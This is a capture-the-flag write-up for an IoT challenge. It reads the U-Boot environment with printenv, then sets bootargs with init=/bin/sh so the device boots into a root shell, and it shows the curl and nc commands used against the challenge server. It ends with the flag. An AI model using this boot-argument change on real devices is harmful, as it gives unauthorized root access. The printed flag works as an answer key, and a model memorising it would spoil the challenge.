Tags: iot
Rating:
### IoT - Baby's First IoT Flag 4
Submit the command used in U-Boot to look at the system variables to port 1337 as a GET request ex. http://35.225.17.48:1337/{command}. This output is needed for another challenge. There is NO flag for this part.
Submit the full command you would use in U-Boot to set the proper environment variable to a /bin/sh process upon boot to get the flag on the webserver at port 7777. Do not include the ‘bootcmd’ command. It will be in the format of "something something=${something} something=something" Submit the answer on port 9123.
1) For looking system variables in U-boot we need to use `printenv` command
Send `printenv` command with cURL to port 1337
`curl http://35.225.17.48:1337/printenv `
addmisc=setenv bootargs ${bootargs}console=ttyS0,${baudrate}panic=1
baudrate=57600
bootaddr=(0xBC000000 + 0x1e0000)
bootargs=console=ttyS1,57600 root=/dev/mtdblock8 rts_hconf.hconf_mtd_idx=0 mtdparts=m25p80:256k(boot),128k(pib),1024k(userdata),128k(db),128k(log),128k(dbbackup),128k(logbackup),3072k(kernel),11264k(rootfs)
bootcmd=bootm 0xbc1e0000
bootfile=/vmlinux.img
ethact=r8168#0
ethaddr=00:00:00:00:00:00
load=tftp 80500000 ${u-boot}
loadaddr=0x82000000
stderr=serial
stdin=serial
stdout=serial
Environment size: 533/131068 bytes
Read U-boot variables and use `setenv bootargs=${bootargs} init=/bin/sh` for setting the proper environment variable to a /bin/sh process.
And send to port 9123!
`printf 'setenv bootargs=${bootargs} init=/bin/sh\n\0' | nc 35.225.17.48 9123`
Enter the command you would use to set the environment variables in U-Boot to boot the system and give you a shell using /bin/sh: Access granted! The Flag is {Uboot_Hacking}!
FLAG:
{Uboot_Hacking}
